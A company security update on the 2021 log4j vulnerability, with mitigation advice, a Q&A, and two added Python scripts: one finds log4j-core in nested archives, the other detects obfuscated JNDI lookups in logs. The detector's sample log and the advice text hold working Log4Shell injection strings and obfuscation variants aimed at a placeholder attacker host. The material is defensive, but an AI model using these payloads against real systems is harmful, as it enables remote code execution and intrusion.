Dec 16, 2021 · 6 min read

Security update – The log4j vulnerability

by Mark Strande

Over the last few days, media and businesses worldwide have reported a critical vulnerability in log4j, a widely used software component. It affects a very large number of software programs, and with them companies and services globally, including Klarna. We were well prepared to manage this new vulnerability, as well as the malware and attacks exploiting it, and took swift action. Our automated processes and proactive approach ensured that we closed any exposure in services known to use log4j. We continually monitor new vulnerabilities in log4j and in all other software we run, and apply security updates accordingly.

At Klarna, security and privacy are a top priority, and we would like to reassure both our consumers and retail partners that our Security Operations Center, which runs our security monitoring, has not detected any breach of our systems or products during this period. Our systems and products are fully operational and transacting at full capacity as normal. Additionally, our security monitoring has reported no impact on consumer data.

Klarna is committed to being transparent with our retail partners and consumers. Below we share a short summary of the actions Klarna has taken to mitigate this vulnerability and answer some of the most frequently asked questions. Based on our experience, we also offer advice to our retail partners and other stakeholders on the actions they can take to mitigate this vulnerability. We believe that security and protection are in everyone's interest in ensuring a safe internet environment.

Overview of what happened

Klarna's network and internal systems are monitored 24/7 by our Security Operations Center, which ensures smooth operations and identifies possible threats. We became aware of the vulnerability at 05:17 CET on Friday, Dec 10, and immediately assembled key engineering teams, who started working on it with priority.

The impact on Klarna was limited. Within the first few hours, the majority of our services were fully secured against the vulnerability. Work continued throughout Friday and over the weekend to monitor for any additional issues. We are continuing to validate that no further exposure exists through additional scans, and are actively following up with third-party vendors.

We have also updated our detective and protective measures to manage the new threats. Additionally, we are continually monitoring new developments in attacks against these vulnerabilities, and continue to review our systems and infrastructure for signs of attempted attacks.

Recommendations to retail partners and other stakeholders

We would like to offer some advice to our retail partners, and to anyone who runs services on the internet, on how to protect yourself against this vulnerability and what steps you can take to keep everyone's information and systems safe. This is not a comprehensive list of actions, but guidance we believe is useful, based on insights from Klarna's Security Operations Center:

  • Apply security patches and updates to any software that uses log4j, and study the advisories from your software vendors. Here and here are two lists of well-known software and their status. It does not matter which programming languages you use: some of your platforms may still be based on Java and use log4j as a component.
  • The use of log4j is prevalent and it may show up in unexpected places. Searching file systems for the name log4j is a useful start, but also look inside software package and archive files such as .jar, .war and .ear, including archives nested inside other archives. A bundled or "shaded" copy can carry an unrelated file name, so match on the contents (the org/apache/logging/log4j class path) rather than on the file name alone.
  • Patching is not the only way to remediate; see some suggestions here. Apache's advisory describes, for example, removing the JndiLookup class from the log4j-core jar where an upgrade is not immediately possible.
  • Update any threat detection systems: many vendors have added signatures that detect exploitation attempts. You can find some advice on how to set up detection patterns here.
  • The same applies to systems that block threats, such as web application firewalls. Keep in mind that such blocking can be bypassed with the same obfuscation tricks used against log detection, so treat it as a stopgap rather than a fix.
  • Look for signatures of exploitation attempts in log files, and not only in web server logs: any attacker-controlled value that ends up being logged (User-Agent and other request headers, URL paths and parameters, form fields, usernames) is a possible injection point. Note that various obfuscation methods exist, such as nested lookups (${${lower:j}ndi:...}, ${::-j}) and URL encoding; tools that normalize these before matching are being developed.
  • Contact your service providers and vendors to find out if and how they have managed the threat.
  • Consult cyber security organizations for advice on how to address these threats. Good advice is publicly available, for example from cisa.gov.
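As an added example of the file-system search recommended above (this is not Klarna's tooling, nor code from the original post), the following Python script walks a directory tree, opens every .jar/.war/.ear/.zip it finds, recurses into archives nested inside them, and reports each archive that still ships log4j-core's JndiLookup class, together with the version recorded in the jar's Maven pom.properties. Matching on the class path rather than on the file name is what catches the renamed or shaded copy. The fixture built by build_demo_tree() is constructed for the demonstration: the jar names, the placeholder class bytes and the version string are made up.

```python
"""Locate log4j-core on disk, including copies nested inside other archives.

Added example for this post, not Klarna's tooling. The fixture in build_demo_tree()
is constructed: jar names, placeholder class bytes and the version string are made up.
"""
import io
import tempfile
import zipfile
from pathlib import Path

# The class behind the JNDI lookup feature; it lives in every unmodified log4j-core 2.x jar,
# so matching on this path (not on the jar's file name) also catches renamed or shaded copies.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven-built log4j-core jars record their version here.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = {".jar", ".war", ".ear", ".zip"}


def _version_from(zf):
    """Version from pom.properties, or 'unknown' for a shaded copy that carries no metadata."""
    if POM_PROPS not in zf.namelist():
        return "unknown"
    for raw in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        key, sep, value = raw.partition("=")
        if sep and key.strip() == "version":
            return value.strip()
    return "unknown"


def inspect_archive(data, label, findings):
    """Inspect an archive held in memory and recurse into archives it contains.
    Appends (label, version) for every archive that still ships JndiLookup.class; a jar
    from which the class was deleted (the mitigation in Apache's advisory) is not reported."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = zf.namelist()
    if JNDI_LOOKUP in names:
        findings.append((label, _version_from(zf)))
    for name in names:
        if Path(name).suffix.lower() in ARCHIVE_SUFFIXES:
            inspect_archive(zf.read(name), f"{label}!{name}", findings)


def scan_tree(root):
    """Walk a directory tree; return [(path or nested path, version), ...] relative to root."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            inspect_archive(path.read_bytes(), path.relative_to(root).as_posix(), findings)
    return findings


def _zip_bytes(entries):
    """Build a zip archive in memory from {entry name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_demo_tree(root):
    """Constructed fixture: a plainly named log4j-core jar, the same classes under an
    innocuous name nested inside a war, and a jar with JndiLookup.class removed."""
    root = Path(root)
    (root / "lib").mkdir(parents=True, exist_ok=True)
    fake_class = b"\xca\xfe\xba\xbe"  # placeholder: real class files start with this magic
    (root / "lib" / "log4j-core-2.14.1.jar").write_bytes(_zip_bytes({
        JNDI_LOOKUP: fake_class,
        POM_PROPS: b"version=2.14.1\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n",
    }))
    shaded = _zip_bytes({JNDI_LOOKUP: fake_class})  # no log4j in the name, no pom.properties
    (root / "app.war").write_bytes(_zip_bytes({"WEB-INF/lib/platform-logging.jar": shaded}))
    (root / "lib" / "log4j-core-mitigated.jar").write_bytes(_zip_bytes({POM_PROPS: b"version=2.14.1\n"}))


def run_demo():
    """Build the fixture in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for label, version in run_demo():
        print(f"{label}: log4j-core {version} with JndiLookup present")
```

Run scan_tree() against application roots, extracted container images and vendor install directories, and compare each reported version with the fixed releases named in the Apache advisory. A jar on disk is not necessarily the one a process loaded, so also check the class path of the running JVMs (for example, java.class.path in the output of `jcmd <pid> VM.system_properties`).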
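As an added example of the log search recommended above (again not Klarna's detection logic, nor code from the original post), this Python snippet normalizes each log line the way log4j's own lookup substitution would before matching, so that the common obfuscations collapse back to ${jndi:...}: nested ${lower:...}/${upper:...} lookups, ${x:-default} fallbacks such as ${::-j} and ${env:NaN:-j}, and single or double URL encoding. A line that still contains nested lookups after normalization is flagged separately, because that pattern is rarely legitimate even when the lookup cannot be resolved. The access-log lines in SAMPLE_LOG are constructed and attacker.example is a placeholder host.

```python
"""Detect Log4Shell-style JNDI lookup strings in log lines, including common obfuscations.

Added example for this post; it is not Klarna's detection logic. SAMPLE_LOG is constructed
and attacker.example is a placeholder host.
"""
import re
from urllib.parse import unquote

# Innermost ${...} token: a lookup whose body contains no further lookups.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A resolved (de-obfuscated) JNDI lookup such as ${jndi:ldap://host/x}; captures the target.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([^}]*)\}", re.IGNORECASE)
# A lookup nested inside another lookup; rarely legitimate in attacker-reachable fields.
NESTED = re.compile(r"\$\{[^}]*\$\{")


def _resolve_lookup(body):
    """Evaluate one innermost lookup the way log4j 2.x substitution would, as far as an
    attacker relies on it: ${lower:X}/${upper:X} change case, and an unresolvable variable
    with a default (${env:X:-j}, ${::-j}) yields the default. The jndi: lookup itself and
    any lookup we do not model (date:, sys:, ...) are left untouched."""
    name, sep, arg = body.partition(":")
    if sep and name.strip().lower() == "jndi":
        return "${" + body + "}"
    if ":-" in body:
        return body.split(":-", 1)[1]
    if sep and name.strip().lower() == "lower":
        return arg.lower()
    if sep and name.strip().lower() == "upper":
        return arg.upper()
    return "${" + body + "}"


def normalize(text, max_rounds=20):
    """URL-decode (up to twice, for double-encoded payloads), then resolve lookups from the
    inside out until nothing changes."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(lambda m: _resolve_lookup(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def classify(line):
    """("jndi", target) for a resolved JNDI lookup, ("nested", None) for leftover nested
    lookups, or None when the line looks clean."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if m:
        return ("jndi", m.group(1).strip())
    if NESTED.search(norm):
        return ("nested", None)
    return None


def scan_lines(lines):
    """Return [(1-based line number, verdict, target), ...] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict[0], verdict[1]))
    return hits


# Constructed sample: access-log lines carrying payloads in the User-Agent field or the URL.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:05:17:00 +0100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:05:17:01 +0100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:05:17:02 +0100] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://attacker.example/b}"',
    '203.0.113.5 - - [10/Dec/2021:05:17:03 +0100] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '203.0.113.5 - - [10/Dec/2021:05:17:04 +0100] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${upper:l}DAP://attacker.example/d}"',
    '203.0.113.5 - - [10/Dec/2021:05:17:05 +0100] "GET /?q=%24%7Bjndi%3Aldaps%3A%2F%2Fattacker.example%2Fe%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.5 - - [10/Dec/2021:05:17:06 +0100] "GET / HTTP/1.1" 200 512 "-" "${${date:j}ndi:ldap://attacker.example/f}"',
]

if __name__ == "__main__":
    for n, verdict, target in scan_lines(SAMPLE_LOG):
        print(f"line {n}: {verdict} {target or ''}")
```

Normalizing first and matching second is the point: a signature for the literal string jndi: misses every obfuscated line in the sample except the first payload. Treat the "nested" verdict as a lower-confidence indicator worth reviewing, and remember that the same normalization is needed anywhere the value may have been logged, not only in the web tier.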

Q&A

What is Log4j and this vulnerability?

Log4j is a logging library for Java, maintained by the Apache Software Foundation, that is built into a very large number of products and services worldwide, often as a component several layers down, which is why it also turns up in software that is not obviously Java-based. A few days ago a vulnerability in Log4j was publicly disclosed which lets an attacker run their own code on a system simply by getting that system to log a specially crafted string. Shortly afterwards, attacks against this vulnerability were observed across the internet, with attackers attempting to gain control over systems. Read more here from Apache.org.

As a consumer, is there anything that I need to do?

No, as a Klarna user there is nothing you need to do at this time. We have done everything possible to secure our systems and your data. As always, we recommend that you keep your devices and computers up to date with the latest security updates.

I’m a retail partner, is there anything that I should be doing?

From a Klarna integration perspective, there is nothing that you need to do regarding Klarna products and services but you should ensure your own systems are safe against this threat. Please read the advice above and take necessary actions as soon as possible.

Has this resulted in a security breach or attack at Klarna?

Our security monitoring capabilities have not detected any breach of our systems or products for consumers or retail partners at any time.

Has any personal data been exposed?

There has been no reported consumer data impact.